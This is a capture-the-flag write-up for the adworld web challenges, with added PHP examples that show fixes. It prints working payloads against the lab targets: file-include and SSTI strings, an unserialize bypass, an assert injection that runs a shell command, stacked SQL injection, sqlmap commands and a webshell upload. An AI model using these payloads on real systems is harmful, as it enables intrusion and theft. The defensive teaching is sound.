
攻防世界 (adworld) Advanced Area, Web Section: Write-up

 2 years ago
source link: https://iamywang.github.io/2020/adworld-web/

0x01 baby_web

Just open F12 (the browser developer tools) and the flag is right there.
[figure: web-001.png]

0x02 Training-WWW-Robots

The robots exclusion protocol: open robots.txt directly.
[figure: web-002.png]
Then follow it to the flag.
[figure: web-003.png]

0x03 php_rce

The ThinkPHP RCE vulnerability.
https://xz.aliyun.com/t/3845
https://cloud.tencent.com/developer/article/1512547
[figure: web-004.png]
[figure: web-005.png]

0x04 Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
// strstr() and str_replace() are case-sensitive: only the exact spelling "php://" is stripped
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>

Go straight at it: bypass the filter by changing the case.
[figure: web-007.png]
The flag file shows up; cat it out to read it:

<?php
$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";
?>

0x05 ics-06

index.php accepts a parameter, and the page even says it is a "free points" question.
[figure: web-006.png]
Brute-force id; at id=2333 you get the flag.
flag: cyberpeace{d18779aa24d5f4b51d1e9ebe6a247a53}

0x06 warmup

<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        // Only the part of $page before the first '?' is checked ...
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];   // ... but the full, unchecked string is what gets included
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>

The parameter is file, and a hint.php is mentioned; let's try it:

"hint"=>"hint.php"

The flag is not in hint.php.
[figure: web-008.png]
Note that the check only passes when the name starts with hint or source, but the truncation is flawed:

$_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));

Build the parameter accordingly and get the flag.
[figure: web-009.png]
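An added defensive example, not part of the original write-up or of either challenge: a page loader that closes both weaknesses above, the case-sensitive "php://" stripping in 0x04 and the check-the-prefix-but-include-the-whole-string mismatch in 0x06. The function name and the sample inputs are my own.

```php
<?php
// Added defensive example. The two includes above go wrong in different ways:
//   0x04 strips "php://" with case-sensitive strstr/str_replace, so any
//        different casing of the scheme survives the loop;
//   0x06 validates only the part of $page before the first '?', then
//        includes the original, unvalidated string.
// The fix for both is the same: never include the raw parameter. Map a key
// from a fixed allow-list to a file name, and include only that.

const PAGES = ['source' => 'source.php', 'hint' => 'hint.php'];

/**
 * Return the file to include for a request parameter, or null to refuse.
 * Anything that is not exactly an allow-list key is rejected, so stream
 * wrappers, '?' suffixes and URL-encoded variants never reach include().
 */
function resolve_page(string $page): ?string
{
    // Reject any stream wrapper regardless of case (php://, PHP://, data:, ...)
    if (preg_match('~^[a-z][a-z0-9+.-]*:~i', $page)) {
        return null;
    }
    // Exact key lookup: no substring tricks, no decoding, no truncation.
    return PAGES[$page] ?? null;
}

// Constructed inputs for demonstration (not payloads from the write-up).
$cases = [
    'hint'                  => 'hint.php',   // allowed key
    'hint.php'              => null,         // values are not keys
    'hint.php?x'            => null,         // would pass the 0x06 prefix check
    'PHP://anything'        => null,         // would survive the 0x04 loop
    'hint%3F..%2Fsomething' => null,         // urldecode variant rejected
];
foreach ($cases as $in => $expected) {
    $got = resolve_page($in);
    printf("%-25s -> %s\n", $in, $got === null ? 'refused' : "include $got");
    assert($got === $expected);
}
```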

0x07 NewsCenter

Obviously SQL injection.
First capture the request with Burp and save it:
[figure: web-010.png]
Use sqlmap to enumerate the databases:

sqlmap -r ncenter --dbs

Two databases come back:

available databases [2]:
[*] information_schema
[*] news

Dig further:

sqlmap -r ncenter -D news --dump

The flag is in news:

Database: news
Table: secret_table
[1 entry]
+----+--------------------------+
| id | fl4g |
+----+--------------------------+
| 1 | QCTF{sq1_inJec7ion_ezzz} |
+----+--------------------------+

0x08 Web_python_template_injection

http://111.198.29.45:48124/%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D

flag: ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

0x09 Web_php_unserialize

function __wakeup() { 
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
...
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
}
...

Two bypasses are needed, so construct the payload like this:

$A = new Demo('fl4g.php');
$C = serialize($A);
//string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
//(the private property name is really "\0Demo\0file"; the two null bytes do not print, hence s:10)
$C = str_replace('O:4', 'O:+4',$C);// bypass preg_match
$C = str_replace(':1:', ':2:',$C);// bypass __wakeup
var_dump($C);
//string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
var_dump(base64_encode($C));
//string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";

0x10 NaNNaNNaNNaN-Batman

Garbled code. Seeing the eval at the end reminded me of the "Happy Time" virus I had looked at earlier, so I changed eval to alert.

<script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){	[0]);.splice(0,1)}}}	\'<input id="c">< onclick=$()>Ok</>\');delete _var ","docu.)match(/"];/)!=null=["	write(s[o%4]buttonif(e.ment';for(Y in $='	')with(_.split($[Y]))_=join(pop());eval(_)</script>

That yields the source:

function $(){
    var e=document.getElementById("c").value;
    if(e.length==16)
    if(e.match(/^be0f23/)!=null)
    if(e.match(/233ac/)!=null)
    if(e.match(/e98aa$/)!=null)
    if(e.match(/c7be9/)!=null){
        var t=["fl","s_a","i","e}"];
        var n=["a","_h0l","n"];
        var r=["g{","e","_0"];
        var i=["it'","_","n"];
        var s=[t,n,r,i];
        for(var o=0;o<13;++o){
            document.write(s[o%4][0]);
            s[o%4].splice(0,1)
        }
    }
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

It checks the length and a few substrings; very simple, just enter b0ef233ac7be98aa.
flag: flag{it's_a_h0le_in_0ne}

0x11 PHP2

Source leak at http://111.198.29.45:57978/index.phps:

<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>

admin cannot be passed directly; it has to go through an extra round of URL encoding:
admin -> a%2564min

Access granted!

Key: cyberpeace{fe0187fb1b68b1a9d10c3fc0ee67787c}

0x12 unserialize3

A fragment of code; the parameter to pass is code.

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}

?code=

First try creating an instance and serializing it to see the format:

$t = new xctf();
$s = serialize($t);
echo $s; # O:4:"xctf":1:{s:4:"flag";s:3:"111";}

That obviously returns bad requests; we need to keep __wakeup from running.
Reference: https://bugs.php.net/bug.php?id=72663
When the property count declared in the serialized string is larger than the real number of properties, __wakeup is skipped.

O:4:"xctf":3:{s:4:"flag";s:3:"111";}
# I changed the 1 to a 3
# and got the flag: cyberpeace{7f9dcb142f763dbbb2e4112be6656543}
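An added example, not from the write-up or either challenge, covering both 0x09 and 0x12: why the regex gate and the __wakeup() reset are not sound protections, and the standard fix of refusing object instantiation with the allowed_classes option of unserialize(). The Demo class, payload strings and safe_unserialize() here are my own.

```php
<?php
// Added defensive example. Two lessons from 0x09 and 0x12:
//  1. A regex gate like /[oc]:\d+:/i is a denylist of one spelling. PHP's
//     parser also accepts "O:+4:", which the pattern does not match.
//  2. __wakeup() is not a security boundary: on PHP versions affected by
//     bugs.php.net #72663 (cited above), a declared property count larger
//     than the real one builds the object and skips __wakeup(); later
//     versions make unserialize() return false instead.
// The robust fix is to refuse object instantiation entirely.

class Demo
{
    public $file = 'index.php';
    public function __wakeup()
    {
        $this->file = 'index.php';   // the "protection" the challenges relied on
    }
}

// Constructed payloads in the shape the write-up describes (public property here).
$normal = 'O:4:"Demo":1:{s:4:"file";s:8:"fl4g.php";}';
$bypass = 'O:+4:"Demo":2:{s:4:"file";s:8:"fl4g.php";}'; // '+' and count 2 > 1

// 1. The original gate blocks the first string and lets the second through.
$gate = '/[oc]:\d+:/i';
assert(preg_match($gate, $normal) === 1);
assert(preg_match($gate, $bypass) === 0);

// 2. Plain unserialize(): __wakeup() resets the normal object, but on an
//    affected PHP the bypass string keeps the attacker-chosen file name.
assert(@unserialize($normal)->file === 'index.php');
$obj = @unserialize($bypass);
assert($obj === false || ($obj instanceof Demo && $obj->file === 'fl4g.php'));

// 3. Fix: forbid every class. Object payloads become __PHP_Incomplete_Class
//    (no constructor, no magic method) and malformed input yields false;
//    both are refused. Scalars and arrays still round-trip.
function safe_unserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false || $value instanceof __PHP_Incomplete_Class) {
        return null;   // note: a serialized boolean false is refused too
    }
    return $value;
}
assert(safe_unserialize($normal) === null);
assert(safe_unserialize($bypass) === null);
assert(safe_unserialize('a:1:{i:0;s:2:"ok";}') === ['ok']);
echo "all checks passed\n";
```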

0x13 upload1

Upload a file and capture the request.
[figure: web-011.png]
Try a one-line webshell (一句话木马).
[figure: web-012.png]

upload success : upload/1586441159.1.php

Connect with AntSword (蚁剑) and get the flag.
[figure: web-013.png]

0x14 supersqli

SQL injection; inject freely.

1'; show tables;--

That lists all tables:

array(1) {
[0]=>
string(16) "1919810931114514"
}

array(1) {
[0]=>
string(5) "words"
}

HANDLER statement:

HANDLER ... OPEN opens a table so that it can be accessed with subsequent HANDLER ... READ statements. The table object is not shared with other sessions and is not closed until HANDLER ... CLOSE is issued or the session ends.
1';
handler `1919810931114514` open;
handler `1919810931114514` read first;--

flag:

array(1) {
[0]=>
string(38) "flag{c168d583ed0d4d7196967b28cbd0b5e9}"
}

0x15 easytornado

In flag.txt:

flag in /fllllllllllllag

In hints:

md5(cookie_secret+md5(filename))

Two parameters are passed: filename and this md5.
So in practice it is:

filename=/fllllllllllllag
filehash=md5(cookie_secret+md5(/fllllllllllllag)) # 3bf9f6cf685a6dd8defadabfb41a03a1

SSTI via the error page:

http://159.138.137.79:51650/error?msg={{handler.settings}}
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '4c6e1bcd-fe36-48ac-8aaf-864629aa45c4'}

That gives the filehash, and with it the flag:

filehash=d7a271c78916db6de35bc157fac1363b
flag{3f39aea39db345769397ae895edb9c70}

0x16 lottery

A lottery system with its source leaked through .git:

python2 GitHack.py http://159.138.137.79:49428/.git/

The vulnerability is in api.php:

if($numbers[$i] == $win_numbers[$i]){
$same_count++;
}

PHP loose comparison, so take advantage of it when passing the parameters:

{"action":"buy", "numbers":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":true}}

The response looks like this:

{"status":"ok","numbers":[true,true,true,true,true,true,true],"win_numbers":"8851836","money":15401806,"prize":5000000}

flag:

cyberpeace{6af0b4ebf4c625c6ababcfa41f673b49}
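An added example, not the challenge's api.php: the loose loop from above beside a hardened version that validates the submitted numbers before comparing. Function names, the fixture and the winning number taken from the response above are my own construction.

```php
<?php
// Added defensive example (not the challenge's api.php). The vulnerable loop
// compares a JSON-supplied value with one digit of the winning number using ==.
// With a boolean on the left, PHP converts the string digit to bool, so
// true == "8" holds and every position "matches".

$win_numbers = '8851836';              // value shown in the write-up's response

function same_count_loose($numbers, string $win_numbers): int
{
    $same_count = 0;
    for ($i = 0; $i < 7; $i++) {
        if ($numbers[$i] == $win_numbers[$i]) {   // loose comparison
            $same_count++;
        }
    }
    return $same_count;
}

// Hardened: require exactly seven ASCII digits, then compare char by char
// with ===; any other type or shape is refused before any comparison.
function same_count_strict($numbers, string $win_numbers): ?int
{
    if (!is_string($numbers) || !preg_match('/^[0-9]{7}$/', $numbers)) {
        return null;                                   // reject, do not compare
    }
    $same_count = 0;
    for ($i = 0; $i < 7; $i++) {
        if ($numbers[$i] === $win_numbers[$i]) {
            $same_count++;
        }
    }
    return $same_count;
}

$bools = json_decode('[true,true,true,true,true,true,true]');   // shape from the write-up
assert(same_count_loose($bools, $win_numbers) === 7);          // jackpot without a digit
assert(same_count_strict($bools, $win_numbers) === null);      // refused
assert(same_count_strict('8851836', $win_numbers) === 7);      // genuine match
assert(same_count_strict('0851836', $win_numbers) === 6);
assert(same_count_strict('8851836x', $win_numbers) === null);
echo "all checks passed\n";
```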

0x17 mfw

PHP source leaked; the parameter is page:

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

There is an assert on a string, so break out from there:

?page=').system("cat templates/flag.php");//

That returns the flag directly:

<!--?php $FLAG="cyberpeace{c4641d834ad80134d88d40e437d868ea}"; ?-->
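An added defensive example, not the challenge's code: a replacement for the string-argument assert() above that resolves the requested template and refuses anything outside the templates directory. The function, the temporary fixture directory and the test inputs are my own.

```php
<?php
// Added defensive example (not the challenge's index.php). In PHP 5/7,
// assert() given a *string* evaluates it as code, and '$file' is interpolated
// into that string first, so the request parameter becomes part of the code
// that runs. The substring test for '..' also says nothing about where the
// final path actually ends up.

// Hardened replacement: no string assert; resolve the path and require it to
// stay inside the templates directory. Names and directory layout are mine.
function resolve_template(string $page, string $base_dir): ?string
{
    $real_base = realpath($base_dir);
    $candidate = realpath($base_dir . '/' . $page . '.php');
    if ($real_base === false || $candidate === false) {
        return null;                       // missing file: refuse quietly
    }
    // The resolved file must sit below the resolved base directory.
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // escaped the directory
    }
    return $candidate;
}

// Constructed fixture: a temporary templates directory with one real page
// and one file outside it.
$base = sys_get_temp_dir() . '/tpl_' . bin2hex(random_bytes(4));
mkdir($base . '/templates', 0700, true);
file_put_contents($base . '/templates/home.php', "<p>home</p>\n");
file_put_contents($base . '/outside.php', "<p>not a template</p>\n");

$tpl = $base . '/templates';
assert(resolve_template('home', $tpl) === realpath($tpl . '/home.php'));
assert(resolve_template('../outside', $tpl) === null);          // traversal refused
assert(resolve_template("').system('echo x');//", $tpl) === null); // now just a missing file
assert(resolve_template('missing', $tpl) === null);
echo "all checks passed\n";
```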

0x18 web2

Reversing PHP code:

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
$_o=strrev($str);
// echo $_o;

for($_0=0;$_0<strlen($_o);$_0++){

$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;
}
return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
Reverse the encryption algorithm; decrypting $miwen gives the flag
*/
?>

Just undo each step in reverse order:

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$_o=str_rot13($miwen);      // undo str_rot13
$_o=strrev($_o);            // undo strrev
$_o=base64_decode($_o);     // undo base64_encode
$_='';
for($_0=0;$_0<strlen($_o);$_0++){
$_c=substr($_o,$_0,1);
$__=ord($_c)-1;             // undo the +1 applied to every byte
$_c=chr($__);
$_=$_.$_c;
}
echo strrev($_);            // undo the initial strrev
?>

flag:

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

0x19 shrine

Flask:

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

From the source: the route lives under /shrine/, the blacklist sets config and self to None, and every '(' and ')' is stripped.
Try the get_flashed_messages() function:

http://159.138.137.79:54847/shrine/{{get_flashed_messages.__globals__['current_app']}}

flag:

flag{shrine_is_good_ssti}
